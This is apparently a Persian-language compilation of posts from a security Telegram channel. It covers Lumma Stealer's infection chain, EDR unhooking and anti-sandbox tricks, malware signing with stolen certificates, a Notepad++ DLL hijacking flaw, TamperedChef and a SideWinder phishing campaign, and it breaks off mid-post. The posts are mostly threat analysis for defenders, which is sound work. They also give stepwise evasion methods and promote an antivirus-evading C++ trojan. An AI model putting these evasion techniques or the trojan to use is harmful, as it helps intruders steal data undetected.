✅#LummaStealer

🟥 ظهور تکامل یافته‌تر بدافزار Lumma Stealer

بدافزار Lumma Stealer که توسط مجرمان سایبری در بخش‌های مختلف (از جمله مخابرات، بهداشت، بانکداری و بازاریابی) مورد استفاده قرار می‌گرفت، با واریانت‌های جدید ظاهر و نشان‌دهنده یک تهدید سایبری جاری و تکامل یافته‌تر است.

* ساختار و زنجیره آلودگی

تحلیل نمونه‌ای از این بدافزار با هش 87118baadfa7075d7b9d2aff75d8e730 نشان می‌دهد که Lumma Stealer از ابزارهای قانونی برای پنهان‌کاری استفاده می‌کند، تاکتیکی که اغلب توسط APTها برای دور زدن راهکارهای امنیتی سنتی به کار می‌رود.

1. بسته نصب‌کننده: نمونه تحلیل‌شده یک فایل NSIS (Nullsoft Scriptable Install System) است. مهاجمان با سوءاستفاده از این ابزارهای قانونی و پرکاربرد، نرخ تشخیص اولیه را پایین نگه می‌دارند.

2. استخراج اجزا: پس از استخراج (توسط ابزاری مانند 7z)، دو جزء کلیدی ظاهر می‌شوند:

الف " [NSIS].nsi: یک اسکریپت NSIS Obfuscated که زنجیره آلودگی را با فراخوانی Parish.m4a آغاز می‌کند.

ب : Parish.m4a: یک (Batch File) مبهم‌سازی شده که مسئول اجرای مرحله بعد است. سایر فایل‌های با پسوند *.m4a حاوی Blobs داده‌های رمزنگاری شده برای Payload اصلی هستند.

3. سوءاستفاده از AutoIt: اسکریپت دسته‌ای، فایل اجرایی قانونی autoit3.exe را به همراه یک فایل اسکریپت مخرب با پسوند .a3x اجرا می‌کند. AutoIt یک زبان اسکریپت‌نویسی قانونی برای اتوماسیون وظایف در ویندوز است، اما در اینجا برای مقاصد غیرقانونی مورد سوءاستفاده قرار می‌گیرد.

4. کد مبهم‌سازی شده AutoIt: اسکریپت A3X با استفاده از تکنیک‌هایی مانند حلقه while و ساختار switch-case مبهم‌سازی شده تا تحلیل استاتیک آن دشوار باشد. پس از ابهام‌زدایی، اسکریپت نهایی حاوی منطق اصلی بدافزار از جمله تکنیک‌های پایداری و فرار است.

* مکانیزم های فرار پیشرفته

بدافزار Lumma Stealer از چندین تکنیک پیشرفته و سطح بالا برای جلوگیری از تحلیل در محیط‌های Sandbox و ابزارهای امنیتی استفاده می‌کند:

۱. بررسی محیط اجرا

بدافزار پیش از اجرای کامل Payload، محیط را برای تشخیص Sandbox یا ماشین‌های مجازی اسکن می‌کند. این کار با بررسی موارد زیر صورت می‌گیرد:

* نام کامپیوتر (COMPUTERNAME)

* نام کاربری (USERNAME)

* وجود پردازش‌های ابزار مجازی‌سازی: جستجوی پردازش‌هایی مانند vmtoolsd.exe (VMware), VboxTray.exe (VirtualBox) و SandboxieRpcSs.exe (Sandboxie).

* وجود پردازش‌های آنتی‌ویروس: جستجوی پردازش‌هایی مانند avastui.exe.

۲. تکنیک (Anti-debugging)

این بدافزار از اختلاف در مدیریت زمان و سرعت اجرا بین سیستم‌های واقعی و محیط‌های تحلیلی سوءاستفاده می‌کند. این تاکتیک با اندازه‌گیری زمان صرف‌شده برای اجرای یک قطعه کد یا توقف‌های مصنوعی، می‌تواند حضور یک دیباگر را تشخیص دهد.

۳. بررسی (Anti-analysis)

این نمونه تلاش می‌کند تا با پینگ کردن یک دامنه‌ی ساختگی/غیرواقعی (Fabricated Domain) ، محیط را بررسی کند. اگر دامنه در دسترس باشد، ممکن است نشان‌دهنده یک محیط کنترل‌شده (مانند Sandbox) باشد که ترافیک شبکه را شبیه‌سازی می‌کند. در این صورت، پردازش AutoIt خودکشی (self-terminates) می‌کند.

۴. انجام (DLL Unhooking)

این یک تکنیک پیشرفته دفاعی است که اغلب در بدافزارهای APT level دیده می‌شود.

* نرم‌افزارهای امنیتی (مانند EDRها) برای نظارت و مسدود کردن فراخوانی‌های حیاتی API ویندوز (مثل NtCreateProcess در ntdll.dll)، شروع توابع را Hook می‌کنند (یعنی بایت‌های اولیه تابع را تغییر می‌دهند تا اجرا به کد امنیتی هدایت شود).

*۔ Lumma Stealer با بازیابی بایت‌های اصلی و Unhook شده تابع در حافظه، کنترل امنیتی را باطل می‌کند و اجازه می‌دهد فراخوانی‌های مخرب API بدون نظارت اجرا شوند.

۵. مکانیزم پایداری
بدافزار برای حفظ دسترسی در سیستم آلوده، از روش ایجاد یک میانبر اینترنتی (.url) در پوشه Startup ویندوز استفاده می‌کند. این میانبر پس از راه‌اندازی سیستم، یک JScript را اجرا می‌کند که با استفاده از Wnoscript.Shell ، Payload نهایی AutoIt را مجدداً اجرا می‌کند.

مرحله (Next-Stage Payload)

بدافزار Lumma Stealer از تکنیک‌های رمزگشایی و فشرده‌سازی در حافظه برای پنهان کردن Payload نهایی استفاده می‌کند:

* رمزگشایی در حافظه: بدافزار با استفاده از یک تابع خودتعریف، داده‌های رمزنگاری شده را رمزگشایی می‌کند.

* فشرده‌سازی برای پنهان‌کاری بیشتر و کاهش حجم، بدافزار از API ویندوز RtlDecompressFragmentWindows استفاده کرده و داده‌ها را با فرمت LZ Compression (پارامتر 0x2) از حالت فشرده خارج می‌کند.

🟥 مهندسی معکوس: تکنیک DLL Unhooking در بدافزارهای APT

در یک محیط آزمایشگاهی، درک اینکه بدافزاری مانند Lumma Stealer چگونه لایه‌های دفاعی را باطل می‌کند، مستلزم شناخت عمیق از معماری سیستم‌عامل ویندوز و نحوه کارکرد راهکارهای امنیتی نظیر EDR (Endpoint Detection and Response) است.

۱. مکانیزم Hooking توسط راهکارهای امنیتی

راهکارهای امنیتی مدرن (مانند آنتی‌ویروس‌ها و EDRها) برای نظارت بر فعالیت‌های حیاتی یک فرآیند ویندوز، از مکانیزم API Hooking استفاده می‌کنند.

1۔ DLLهای هدف: عموماً توابع حیاتی ویندوز که در DLLهای سطح پایین مانند ntdll.dll (شامل توابع Native API مانند NtCreateProcess , NtWriteFile , NtAllocateVirtualMemory ) و kernel32.dll قرار دارند، هدف این تکنیک هستند.

2۔ فرآیند (Inline Hooking)

* هنگامی که یک فرآیند (مثلاً فرآیند Lumma Stealer) شروع به کار می‌کند، EDR به فضای آدرس آن فرآیند تزریق می‌شود.

* ۔EDR بایت‌های اولیه (Preamble) تابع هدف در حافظه (مثلاً تابع NtCreateProcess در ntdll.dll) را بازنویسی می‌کند.

* این بایت‌های بازنویسی شده معمولاً شامل دستورات JMP یا CALL هستند که اجرای طبیعی تابع را به یک قطعه کد رهگیری در داخل کتابخانه EDR هدایت می‌کنند.

* نتیجه: پیش از اینکه فراخوانی سیستم (Syscall) واقعی به کرنل برسد، EDR فرصت دارد که آرگومان‌ها را بررسی کرده و در صورت مخرب بودن، آن را مسدود کند.

۲. مکانیزم Unhooking توسط بدافزار (Lumma Stealer)

بدافزار Lumma Stealer و سایر بدافزارهای APT برای فرار از این نظارت، این فرآیند را معکوس می‌کنند:

1. هدف: بازگرداندن حافظه تابع Hook شده به حالت اصلی و تمیز آن.

2. منبع داده اصلی: بدافزار برای به دست آوردن کدهای اصلی و Unhook شده، از تکنیک‌های زیر استفاده می‌کند:

* بارگیری مجدد DLL : بدافزار می‌تواند نسخه تمیز DLL هدف (مثلاً ntdll.dll) را مجدداً بارگیری کند، اما نه در فضایی که توسط ویندوز استفاده می‌شود (معمولاً با استفاده از LoadLibraryEx با پرچم‌های خاص). سپس بایت‌های اولیه تابع هدف را از این نسخه جدید خوانده و کپی می‌کند.

* خواندن از دیسک: بدافزار می‌تواند به طور مستقیم فایل DLL اصلی (مثلاً C:\Windows\System32\ntdll.dll ) را از دیسک بخواند و Preamble اصلی تابع را استخراج کند. این روش رایج‌تر و قابل اعتمادتر است، چرا که نسخه روی دیسک (معمولاً) دستکاری نشده است.

3. بازنویسی حافظه (Memory Overwrite):

* بدافزار تابع VirtualProtect را فراخوانی می‌کند تا دسترسی به حافظه آن بخش از ntdll.dll را از READ/EXECUTE به READ/WRITE/EXECUTE تغییر دهد.

* بایت‌های اصلی استخراج‌شده (Preamble تمیز) را روی حافظه تابع Hook شده کپی می‌کند.

* دسترسی حافظه را دوباره به حالت اولیه READ/EXECUTE برمی‌گرداند.

نتیجه Unhooking: از این لحظه به بعد، هر فراخوانی سیستم از داخل فرآیند بدافزار به آن تابع (مثلاً NtCreateProcess) مستقیماً به هسته سیستم عامل هدایت می‌شود و راهکار امنیتی (EDR) در عمل کور می‌شود و نمی‌تواند آن فعالیت را نظارت یا مسدود کند.

پیاده‌سازی و تحلیل در محیط آزمایشگاهی

ابزارهای مورد نیاز:

*۔ Debugger/Disassembler: IDA Pro / Ghidra / x64dbg

* زبان برنامه‌نویسی: Python (برای اسکریپت‌نویسی) و ++C یا Assembly (برای ساخت PoC)

* سیستم‌عامل: ویندوز ۱۰/۱۱ (در محیط VM)

مراحل شبیه‌سازی دفاعی (Defense PoC):

برای درک عمیق‌تر، می‌توانیم یک PoC (Proof of Concept) با Python و کتابخانه ctypes برای تزریق کد یا یک DLL ساده با ++C/C برای Hooking بسازیم.

1۔ Hooking اولیه: تابعی را در ntdll.dll (مانند NtResumeThread) انتخاب کرده و یک JMP به تابع رهگیری خودتان تزریق کنید.

2۔ تحلیل Unhooking (Reverse Engineering):

* بدافزار Lumma Stealer را در x64dbg اجرا کنید.

*۔ Breakpoint را روی توابع کلیدی ویندوز تنظیم کنید:

*۔ LoadLibraryExW: برای رصد تلاش جهت بارگیری مجدد ntdll.dll.

*۔ CreateFileW / ReadFile: برای رصد تلاش برای خواندن ntdll.dll از دیسک.

*۔ VirtualProtect: این مهم‌ترین Breakpoint است. هر فراخوانی به VirtualProtect که دسترسی حافظه DLLهای سیستمی را به WRITE تغییر دهد، نشان‌دهنده یک Unhooking قریب‌الوقوع است.

با دنبال کردن اجرای کد پس از VirtualProtect ، می‌توانید دقیقاً متوجه شوید که بدافزار چگونه بایت‌های اصلی را محاسبه یا بازیابی کرده و آن‌ها را بر روی حافظه Hook شده می‌نویسد.

@NullError_ir

🟥 خودکشی فرآیند (Process Self-Termination) یعنی چه؟

مکانیزم پیشرفته ضدتحلیل

خودکشی پردازشی یا Self-Termination یکی از تاکتیک‌های کلیدی در بدافزارهای مدرن مانند Lumma Stealer است. این تکنیک یک اقدام دفاعی نهایی است که بدافزار برای جلوگیری از تحلیل خود در محیط‌های کنترل‌شده، مانند Sandboxها و ماشین‌های مجازی (VMs) به کار می‌گیرد.

بر خلاف پایان دادن عادی به یک فرآیند (ExitProcess) ، خودکشی پردازشی در بدافزارها با یک مکانیزم تصمیم‌گیری پیشرفته گره خورده است که بر مبنای یافته‌های (Anti-Analysis) عمل می‌کند.

۱. معماری تصمیم‌گیری (Decision Architecture)

خودکشی پردازشی هرگز به صورت تصادفی رخ نمی‌دهد، بلکه نتیجه شکست بدافزار در عبور از تست‌های محیطی است. این فرآیند از الگوریتم‌های شرطی تو در تو (Nested Conditional Logic) استفاده می‌کند:

بررسی فرآیندها/فایل‌های VM (مانند vmtoolsd.exe , VBoxGuestAdditions.sys)

بررسی نام‌های سیستمی (مانند COMPUTERNAME یا USERNAME پیش‌فرض Sandboxها)

بررسی زمان‌بندی و وقفه (Timing and Delay) اجرای سریع و نرم دستورات

بررسی (Debugger Presence) عدم یافتن پرچم BeingDebugged

تست ارتباط شبکه (Fabricated Domain Ping) عدم پاسخگویی به دامنه‌ی ساختگی

۲. مکانیزم‌های فنی خودکشی (Technical Self-Termination Methods)

پس از اینکه بدافزار از طریق تست‌های بالا به قطعیت رسید که در حال تحلیل است، از یکی از روش‌های زیر برای پایان دادن به فرآیند خود استفاده می‌کند:

الف) فراخوانی مستقیم API (Direct API Call)

ساده‌ترین و رایج‌ترین روش، فراخوانی توابع Native API برای خاتمه دادن به فرآیند جاری است:

۔* ExitProcess: این تابع سطح بالا در kernel32.dll است و رایج‌ترین روش خاتمه دادن به فرآیند است.

۔* NtTerminateProcess: این تابع Native API در ntdll.dll است و یک فراخوانی سطح پایین‌تر به هسته است. در بدافزارهای مدرن، اغلب از این تابع استفاده می‌شود تا احتمال Hooking توسط EDRها کمتر شود.

NtTerminateProcess( (HANDLE)-1, 0 );

👆 -1 نشان‌دهنده فرآیند جاری است

ب) تولید استثنای کشنده (Generating Fatal Exception)

یک روش پیشرفته‌تر و پنهان‌تر، مجبور کردن سیستم‌عامل به خاتمه دادن به فرآیند از طریق تولید یک خطای غیرقابل بازیابی (Fatal Exception) است. این کار می‌تواند تحلیلگر را گمراه کند:

* فراخوانی RaiseException با کد خطا: بدافزار می‌تواند عمداً یک استثناء با کدهای خطای خاص (مثلاً STATUS_ILLEGAL_INSTRUCTION) ایجاد کند. اگر بدافزار در یک محیط Sandbox بدون مدیریت استثناء فعال باشد، سیستم‌عامل به سادگی فرآیند را خاتمه می‌دهد.

* دستورات Assembly غیرقانونی (Illegal Instructions): اجرای مستقیم دستورات اسمبلی نامعتبر (مانند INT 3 برای دیباگرها یا دستوراتی که پردازنده فعلی پشتیبانی نمی‌کند) می‌تواند منجر به خطای سخت‌افزاری و خاتمه فرآیند شود.

ج) Self-Overwrite و پاکسازی حافظه (Self-Overwrite and Memory Cleansing)

پیشرفته‌ترین بدافزارها قبل از خودکشی، بخشی از حافظه حیاتی خود را Overwrite کرده یا Unmap می‌کنند.

* هدف: جلوگیری از استخراج Payload نهایی یا کلیدهای رمزگشایی در لحظه مرگ فرآیند.

* روش: استفاده از توابعی مانند VirtualFree برای آزاد کردن نواحی تخصیص یافته حافظه (به خصوص نواحی حاوی Payload مرحله بعد) یا بازنویسی بخش‌های کد با داده‌های تصادفی/صفر (Zero-out) قبل از فراخوانی ExitProcess .

۳. خودکشی هوشمند (Smart Self-Termination) در بدافزارهای امروزی

در بدافزارهای APT، خودکشی پردازشی صرفاً یک پایان ساده نیست، بلکه بخشی از یک استراتژی دفاعی است:

1۔ Delay and Exit: بدافزار ممکن است تشخیص دهد که در حال تحلیل است، اما به جای خاتمه فوری، برای مدت کوتاهی به اجرای عملیات‌های بی‌ضرر ادامه می‌دهد (مثلاً خوابیدن برای یک مدت طولانی با SleepEx یا حلقه‌های طولانی) و سپس به طور ناگهانی خاتمه می‌یابد. این کار باعث می‌شود ابزارهای تحلیل خودکار، قبل از رسیدن به نقطه خودکشی، به دلیل محدودیت زمان اجرا، تحلیل را متوقف کنند و گزارش دهند که بدافزار "فعالیتی نداشته است".

2۔ Clean Exit vs. Crash Exit: بدافزارهای پیچیده تمایل دارند از Clean Exit (خاتمه تمیز با API مانند ExitProcess) استفاده کنند تا فرآیند به طور ناگهانی "Crash" نشود و گزارش خطا یا Dumps حافظه ایجاد نشود که بتواند توسط تحلیلگر بررسی شود.

⬅️ هدف نهایی تحلیلگر بدافزار، نه فقط دور زدن تکنیک، بلکه فهمیدن منطق آن است. ➡️

🔥 دستورالعمل‌های غیرمجاز , بدافزارها و تحلیلگران

🔤🔤🔤 @NullError_ir

✅#SSL

هکرهای APT ایران از گواهینامه‌های SSL.com برای امضای بدافزار استفاده می‌کنند

گروه‌های سایبری ایران (Charming Kitten , Subtle Snail , UNC1549 و زیر شاخه های آنها )از تکنیکی استفاده می‌کنند که در آن با جعل یا سوءاستفاده از گواهی‌های دیجیتال معتبر SSL/TLS ، بدافزارها و ابزارهای خود را امضا (Sign) می‌کنند.

### نکات کلیدی فنی و امنیتی

* هدف اصلی: هدف از امضای بدافزار با گواهی معتبر، فریب دادن سیستم‌عامل‌ها (به خصوص ویندوز) و ابزارهای امنیتی (مانند EDRها و آنتی‌ویروس‌ها) است که اغلب برنامه‌های امضا شده را قابل اعتمادتر و کمتر مخرب تلقی می‌کنند. این امر به بدافزار اجازه می‌دهد تا راحت‌تر از فیلترهای امنیتی عبور کرده و در شبکه قربانی پایداری (Persistence) ایجاد کند.

* روش‌های دستیابی به گواهی‌ها:

* سرقت گواهی: نفوذ به زیرساخت‌های مراکز صدور گواهی (CA - Certificate Authority) مانند حادثه مشهور Comodo و DigiNotar در سال‌های گذشته، که در آن هکرها توانستند گواهی‌های جعلی برای دامنه‌های مهم جهانی (مثل گوگل، یاهو) صادر کنند.

* خرید گواهی‌های مسروقه: خرید گواهی‌های معتبر مسروقه از بازارهای زیرزمینی دارک‌نت.

* استفاده از گواهی‌های منقضی/لغو شده: حتی برخی از گواهی‌های لغو شده یا منقضی شده نیز ممکن است توسط ابزارهای امنیتی قدیمی نادیده گرفته شوند.

* تأثیر بر شناسایی: امضای معتبر باعث می‌شود بدافزار از لحاظ ظاهری شبیه یک نرم‌افزار قانونی و قانونی به نظر برسد، که این موضوع کار مهندسی معکوس و تحلیل بدافزار را برای تحلیلگران امنیتی سخت‌تر می‌کند و شناسایی آن توسط سامانه‌های مبتنی بر امضا را مختل می‌سازد.

* ارتباط با APTها: این تکنیک به طور مکرر توسط گروه‌های APT ایرانی مشاهده شده است که نشان‌دهنده پیچیدگی و سطح بالای دانش فنی این بازیگران در دور زدن مکانیزم‌های امنیتی پایه است.

@NullError_ir

✅Notepad++

آسیب‌پذیری DLL Hijacking در ++Notepad

یک آسیب‌پذیری جدید DLL Hijacking (تزریق کتابخانه پیوند پویا) که به تازگی در ++Notepad ، ویرایشگر محبوب کد منبع، کشف شده است، می‌تواند به مهاجمان اجازه دهد تا کد دلخواه را بر روی دیوایس قربانی اجرا کنند.

این نقص که با شناسه CVE-2025-56383 ثبت شده است، در نسخه 8.8.3 وجود دارد و به طور بالقوه تمامی نسخه‌های نصب شده این نرم‌افزار را تحت تأثیر قرار می‌دهد، که میلیون‌ها کاربر را در معرض خطر قرار می‌دهد. این آسیب‌پذیری به یک مهاجم محلی (Local Attacker) این امکان را می‌دهد که با قرار دادن یک فایل DLL مخرب در مسیری که برنامه برای بارگذاری کتابخانه‌های مورد نیاز خود جستجو می‌کند، به اجرای کد دست یابد. این نوع حمله، اصالت (Integrity) برنامه را تضعیف می‌کند و می‌تواند برای تثبیت دسترسی (Establish Persistence) یا افزایش سطح دسترسی (Escalate Privileges) در یک سیستم آلوده به کار رود.

## انتشار اکسپلویت (PoC Exploit) و جزئیات فنی

۔ DLL Hijacking از نحوه جستجو و بارگذاری کتابخانه‌های مورد نیاز توسط برنامه‌های ویندوز بهره‌برداری می‌کند. اگر یک برنامه بدون تعیین مسیر کامل (Full Path) برای یک DLL جستجو کند، ممکن است در چندین دایرکتوری، بر اساس یک ترتیب از پیش تعریف شده ، به دنبال آن بگردد.

یک مهاجم می‌تواند یک DLL مخرب با همان نام کتابخانه قانونی را در دایرکتوری‌ای قرار دهد که قبل از مکان واقعی کتابخانه توسط سیستم جستجو می‌شود. هنگامی که کاربر برنامه را راه‌اندازی می‌کند، DLL مخرب به جای کتابخانه اصلی بارگذاری و اجرا می‌شود.

در مورد ++Notepad ، این آسیب‌پذیری می‌تواند با هدف قرار دادن DLLهای مرتبط با پلاگین‌های (Plugins) آن بهره‌برداری شود. بر اساس اثبات مفهوم (PoC) منتشر شده، مهاجم می‌تواند فایل یک پلاگین، مانند NppExport.dll که در مسیر ++Notepad\plugins\NppExport\ قرار دارد، را با یک DLL مخرب ساخته‌شده سفارشی (Custom-Crafted Malicious DLL) جایگزین کند.

### تکنیک Proxying برای پنهان‌کاری

برای پنهان ماندن از دید کاربر و اطمینان از اینکه عملکرد برنامه به صورت عادی ادامه پیدا کند، مهاجم می‌تواند DLL اصلی را تغییر نام دهد (مثلاً به original-NppExport.dll ) و سپس کاری کند که جایگزین مخرب، تمام فراخوانی‌های تابع قانونی (Legitimate Function Calls) را به سمت DLL اصلی تغییر نام داده شده، ارجاع (Forward) دهد.

این تکنیک که به عنوان Proxying یا واسطه‌گری شناخته می‌شود، باعث می‌شود رفتار برنامه برای کاربر بدون مشکل (Seamless) به نظر برسد، در حالی که بار داده‌ای مخرب (Malicious Payload) در پس‌زمینه در حال اجرا است.

اندازه فایل NppExport.dll مخرب به طور قابل توجهی کوچکتر از original-NppExport.dll است که نشان‌دهنده وجود کد متفاوت در آن است.

### اجرای فایل مخرب

پس از راه‌اندازی Notepad++.exe ، برنامه، DLL مخرب را بارگذاری می‌کند که منجر به اجرای کد مهاجم می‌شود.

## تثبیت دسترسی و راهکارهای مقابله

تهدید اصلی ناشی از این آسیب‌پذیری، اجرای کد محلی است. مهاجمی که پیش‌تر از طریق بدافزار، فیشینگ یا سایر روش‌ها، دسترسی اولیه به سیستم را به دست آورده باشد، می‌تواند از این نقص برای تثبیت دسترسی استفاده کند.

با Hijack کردن یک DLL در برنامه‌ای پرکاربرد مانند ++Notepad ، کد مهاجم هر بار که کاربر ویرایشگر را باز می‌کند اجرا خواهد شد و این امر بقا و ماندگاری بدافزار را پس از راه‌اندازی مجدد سیستم تضمین می‌کند.

اگرچه این در تست بر روی Notepad++ v8.8.3 نصب شده از طریق نصاب رسمی انجام شده است، اما مشکل زمینه‌ای، اساساً به نحوه بارگذاری مؤلفه‌های برنامه مرتبط است، که نشان می‌دهد هر نسخه نصب شده‌ای می‌تواند آسیب‌پذیر باشد.

### در حال حاضر در این لحظه، هیچ پچ رسمی از سوی توسعه‌دهندگان ++Notepad برای رفع CVE-2025-56383 منتشر نشده است.

@NullError_ir

✅#SatelliteModems

تحقیقات جامع در مورد مودم‌های ماهواره‌ای تجاری موجود در بازار نشان دهنده آسیب‌پذیری‌های امنیتی زیادی در این تجهیزات است.

نکته : رمزگذاری در بسیاری از مودم‌های ماهواره‌ای تجاری به طور پیش‌فرض غیرفعال است - و گاهی اوقات فعال کردن آن هزینه اضافی دارد. در نتیجه، بسیاری از کاربران هرگز رمزگذاری را فعال نمی‌کنند .

تحلیل جامع آسیب‌پذیری‌ها و حملات امنیتی در مودم‌های ماهواره‌ای (به زبان انگلیسی)👇

@NullError_ir

✅#Cracks

✈️ این رو هم ببینید جالبه

▶️ شکستن قفل گاوصندوق

✅ نکته : وقتی شرکت‌های امنیتی بر روی محصولاتشان راهی برای

Reset/Forget/Recovery Password

می‌گذارند و هکرها از آن به عنوان

Backdoor
استفاده می‌کنند .

✈️ @NullError_ir

  

✅#TamperedChef

بدافزار TamperedChef

کمپین جدید بدافزار TamperedChef یک نمونه بارز از رویکرد مهاجمان برای ادغام تکنیک‌های مهندسی نرم‌افزار مدرن با مکانیزم‌های گریز پیشرفته است. این بدافزار با استفاده از برنامه‌های کاربردی تروجان‌شده (Trojanized Productivity Tools) مانند Calendaromatic.exe و ImageLooker.exe ، به طور هدفمند دفاع‌های امنیتی سنتی را دور می‌زند.

۱. دسترسی اولیه

طعمه طعمه‌های این کمپین ابزارهای بهره‌وری به‌ظاهر بی‌ضرر مانند تقویم و نمایشگر تصویر هستند.

توزیع فایل‌های مخرب از طریق آرشیوهای 7-Zip توزیع می‌شوند.

سوءاستفاده از نقص امنیتی نکته فنی کلیدی در این مرحله، بهره‌برداری از آسیب‌پذیری CVE-2025-0411 در مکانیزم Mark of the Web (MotW) ویندوز است.

* مکانیزم MotW: این مکانیزم برای علامت‌گذاری فایل‌هایی است که از اینترنت دانلود شده‌اند و به ویندوز هشدار می‌دهد که باید کنترل‌های امنیتی سخت‌گیرانه‌تری (مانند SmartScreen ) را اعمال کند.

* حمله: با سوءاستفاده از نقص در نحوه مدیریت فایل‌های 7-Zip، بدافزار می‌تواند بدون فعال کردن هشدارهای امنیتی مبتنی بر اعتبار (Reputation-Based Security Controls)، اجرا شود و این کار، مرحله Initial Access را برای مهاجم به شدت تسهیل می‌کند.

۲. پیچیدگی فنی: استفاده از NeutralinoJS و مهندسی بدافزار

چارچوب ساخت بدافزار هر دو فایل Calendaromatic.exe و ImageLooker.exe با استفاده از NeutralinoJS ساخته شده‌اند.

*۔ NeutralinoJS یک چارچوب دسکتاپ سبک‌وزن که به توسعه‌دهندگان اجازه می‌دهد تا برنامه‌های دسکتاپ بومی (Native Desktop Applications) را با استفاده از HTML، CSS و JavaScript بسازند.

* مزیت برای مهاجم این انتخاب به بدافزار اجازه می‌دهد تا ضمن حفظ ظاهر کاملاً قانونی یک نرم‌افزار دسکتاپ، از قدرت و انعطاف‌پذیری جاوا اسکریپت برای اجرای بارهای مخرب و تعامل مستقیم با APIهای سیستم‌عامل استفاده کند. این یک تکنیک Defense Evasion عالی است، زیرا بسیاری از راهکارهای امنیتی، رفتار چارچوب‌های توسعه مشروع را به‌دقت مانیتور نمی‌کنند.

* امضای دیجیتال استفاده از امضاهای دیجیتال معتبر (اگرچه از نهادهای مشکوک مانند CROWN SKY LLC و LIMITED LIABILITY COMPANY APPSOLUTE) به منظور فریب کاربر و همچنین دور زدن فیلترهای امنیتی مبتنی بر اعتبار و شهرت است.

۳. مکانیزم گریز پیشرفته از طریق یونیکد

یکی از پیشرفته‌ترین تکنیک‌های گریز در این بدافزار، استفاده از هموگلیف‌های یونیکد (Unicode Homoglyphs) است:

* عملکرد: بدافزار بارهای مخرب (Malicious Payloads) خود را در پاسخ‌های API که به‌ظاهر بی‌خطر هستند، با استفاده از هموگلیف‌های یونیکد رمزگذاری (Encode) می‌کند.

* گریز از تشخیص: این تکنیک به بدافزار اجازه می‌دهد تا از سیستم‌های تشخیص مبتنی بر رشته (String-Based Detection) و الگوریتم‌های تطبیق امضا (Signature Matching) عبور کند. این ابزارها برای شناسایی الگوهای مشخص در ترافیک شبکه یا فایل‌ها طراحی شده‌اند. وقتی داده‌ها با کاراکترهای یونیکد جایگزین می‌شوند (که شبیه کاراکترهای عادی هستند اما کد متفاوتی دارند)، تشخیص سنتی شکست می‌خورد.

* کانال اجرای مخفی: هنگام اجرا، بدافزار این پیلودهای پنهان را رمزگشایی کرده و آن‌ها را از طریق زمان اجرای NeutralinoJS اجرا می‌کند و عملاً یک کانال اجرای مخفی (Covert Execution Channel) ایجاد می‌کند که زیر رادار سیستم‌های نظارتی مرسوم کار می‌کند.

۴. پایداری و استخراج داده

* پایداری بدافزار از طریق ایجاد وظایف زمان‌بندی‌شده (Scheduled Tasks) و تغییرات در رجیستری ویندوز (Registry Modifications) ، پایداری خود را تضمین می‌کند. استفاده از پرچم‌های خط فرمان (Command-line Flags) مانند --install ، --enableupdate و --fullupdate نشان می‌دهد که مهاجم یک معماری مدولار و قابل کنترل برای مدیریت وضعیت بدافزار دارد.

* فرمان و کنترل : پس از نصب موفق، بدافزار به سرعت با سرورهای فرمان و کنترل (مانند calendaromatic[.]com و movementxview[.]com) ارتباط برقرار می‌کند.

* رمزگذاری C2: این ارتباطات از طریق کانال‌های رمزگذاری‌شده (Encrypted Channels) انجام می‌شود، که تلاش تیم‌های آبی (Blue Teams) برای شناسایی محتوای داده‌های ارسالی یا دستورات دریافتی را به شدت پیچیده می‌کند.

* تأثیر مخرب (Impact): تأثیر بدافزار شامل:

* سرقت اعتبارنامه‌ها و Session Tokens: استخراج اطلاعات ذخیره‌شده حساس از مرورگرها.

* ربایش مرورگر (Browser Hijacking): تغییر تنظیمات مرورگر و هدایت ترافیک وب برای تسهیل فعالیت‌های مخرب مستمر.

* دسترسی دائمی Backdoor: فراهم کردن امکان استخراج داده و اجرای دستورات از راه دور.

@NullError_ir

✅#Ai_Extensions

افزونه‌های جعلی هوش مصنوعی در مرورگرها

مهاجمان در حال انتشار افزونه‌های مخرب برای خصوصا مرورگر کروم هستند که خود را به جای ابزارهای معروف هوش مصنوعی مانند ChatGPT، Claude و Perplexity جا می‌زنند.

روش حمله: این افزونه‌ها پس از نصب، به‌طور مخفیانه موتور جستجوی پیش‌فرض مرورگر شما را تغییر می‌دهند. در نتیجه، تمام جستجوهای شما ابتدا از سرورهای مهاجم عبور می‌کند.

خطر اصلی: این کار به مهاجمان اجازه می‌دهد تمام اطلاعاتی که جستجو می‌کنید (شامل داده‌های شخصی، اطلاعات کاری و محرمانه) را سرقت کنند. این یک حمله از نوع Man-in-the-Middle است.

نحوه توزیع: این افزونه‌های مخرب اغلب از طریق تبلیغات فریبنده و ویدیوهای تبلیغاتی در یوتیوب پخش می‌شوند.

از نصب افزونه‌های ناشناس برای دسترسی به سرویس‌های محبوب خودداری کنید. همیشه قبل از نصب، مجوزهای درخواستی افزونه را به‌دقت بررسی کنید، به‌خصوص اگر درخواست تغییر تنظیمات مرورگر را داشته باشد. تنها از منابع رسمی و کاملاً معتبر افزونه نصب کنید.

اطلاعات بیشتر و شناسایی نمونه‌ها

@NullError_ir

✅#Motorola

دوستانی هم که به این موضوعات علاقه دارند

کالبد شکافی رادیو بیسیم موتورولا

@NullError_ir

✅#Trojan

( c++ ) 🔥🔥🔥

یک نمونه تروجان که می‌تواند اکثر نرم‌افزارهای آنتی‌ویروس و سندباکس‌ها را دور بزند .


نحوه استفاده رو نوشته دقت کنید.

@NullError_ir

✅#GOLANG_Reverse_Engineering

مهندسی معکوس فایل‌های گولنگ با IDA

@NullError_ir

✅#obex

ابزاری برای مسدود کردن dll‌های ناخواسته موقع اجرای یه برنامه - ارزشمند برای نفوذگرها و رد‌ تیم‌ها

@NullError_ir

✅#APT_SideWinder

کمپین جدید SideWinder با هدف سرقت اطلاعات

گروه هکری (APT) SideWinder که یک گروه با حمایت دولتی و سابقه طولانی در عملیات‌های جاسوسی سایبری در جنوب آسیا شناخته می‌شود، اخیراً کمپین فیشینگ جدیدی را با استفاده از پورتال‌های جعلی سرویس‌های ایمیل Outlook و Zimbra آغاز کرده است. هدف اصلی این عملیات، سرقت اطلاعات ورود (Credentials) از اهداف حساس دولتی و نظامی است.

جزئیات فنی و تاکتیک‌های عملیاتی

1. زیرساخت حمله:

* مهاجمان برای میزبانی صفحات فیشینگ خود از پلتفرم‌های هاستینگ رایگان و معتبر مانند Netlify و pages.dev و workers.dev استفاده می‌کنند. این رویکرد دو مزیت کلیدی برای آن‌ها دارد:

* فرار از مکانیزم‌های دفاعی: با استفاده از سرویس‌های معتبر، مهاجمان به‌راحتی فیلترهای مبتنی بر reputaion دامنه را دور می‌زنند.

